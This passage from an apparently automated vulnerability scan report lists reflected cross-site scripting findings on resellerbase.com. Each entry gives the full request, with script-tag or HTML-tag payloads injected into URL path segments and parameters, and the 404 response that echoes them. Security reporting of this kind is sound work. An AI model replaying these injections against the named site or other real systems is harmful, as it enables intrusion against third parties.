HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/imagesc1885<script>alert(1)</script>e52b246e872/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3516. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ec4da<script>alert(1)</script>e4c111c5250 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/ratingec4da<script>alert(1)</script>e4c111c5250/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/ratingec4da<script>alert(1)</script>e4c111c5250/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3517. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a1c4c<script>alert(1)</script>67ee473c034 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/search.phpa1c4c<script>alert(1)</script>67ee473c034?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.phpa1c4c<script>alert(1)</script>67ee473c034?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3518. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 810a4<a>1ee205683b5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search810a4<a>1ee205683b5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search810a4<a>1ee205683b5&opt=2 was not found on this server.</p>
...[SNIP]...

2.3519. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b9472<a>09a06cb2ab6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...b9472<a>09a06cb2ab6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...b9472<a>09a06cb2ab6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3520. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 106d3<script>alert(1)</script>9f2aea15b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&106d3<script>alert(1)</script>9f2aea15b3e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&106d3<script>alert(1)</script>9f2aea15b3e=1 was not found on this server.</p>
...[SNIP]...

2.3521. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ac0ee<a>e8c147c7c04 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ac0ee<a>e8c147c7c04 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ac0ee<a>e8c147c7c04 was not found on this server.</p>
...[SNIP]...

2.3522. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5d36<script>alert(1)</script>a839f616cdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf5d36<script>alert(1)</script>a839f616cdc/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf5d36<script>alert(1)</script>a839f616cdc/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3523. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25e2e<script>alert(1)</script>67874a96f41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/625e2e<script>alert(1)</script>67874a96f41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/625e2e<script>alert(1)</script>67874a96f41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3524. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 50add<script>alert(1)</script>5a729f10637 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes50add<script>alert(1)</script>5a729f10637/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes50add<script>alert(1)</script>5a729f10637/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3525. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f076f<script>alert(1)</script>405924a4d17 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmosf076f<script>alert(1)</script>405924a4d17/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmosf076f<script>alert(1)</script>405924a4d17/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3526. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4ad4f<script>alert(1)</script>9248a6370f5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images4ad4f<script>alert(1)</script>9248a6370f5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images4ad4f<script>alert(1)</script>9248a6370f5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3527. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2114f<script>alert(1)</script>243f5baa39a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/search.php2114f<script>alert(1)</script>243f5baa39a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php2114f<script>alert(1)</script>243f5baa39a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3528. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cd5d1<a>0dd1bbc0ca0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchcd5d1<a>0dd1bbc0ca0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchcd5d1<a>0dd1bbc0ca0&opt=2 was not found on this server.</p>
...[SNIP]...

2.3529. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 48c52<a>e3150b29fbb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...48c52<a>e3150b29fbb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...48c52<a>e3150b29fbb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3530. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7a472<script>alert(1)</script>abf4c759c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&7a472<script>alert(1)</script>abf4c759c58=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&7a472<script>alert(1)</script>abf4c759c58=1 was not found on this server.</p>
...[SNIP]...

2.3531. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fa094<a>f27c146e830 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fa094<a>f27c146e830 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fa094<a>f27c146e830 was not found on this server.</p>
...[SNIP]...

2.3532. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73a0b<script>alert(1)</script>2d954f49cd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail73a0b<script>alert(1)</script>2d954f49cd8/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail73a0b<script>alert(1)</script>2d954f49cd8/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3533. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb60c<script>alert(1)</script>dba326aff6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

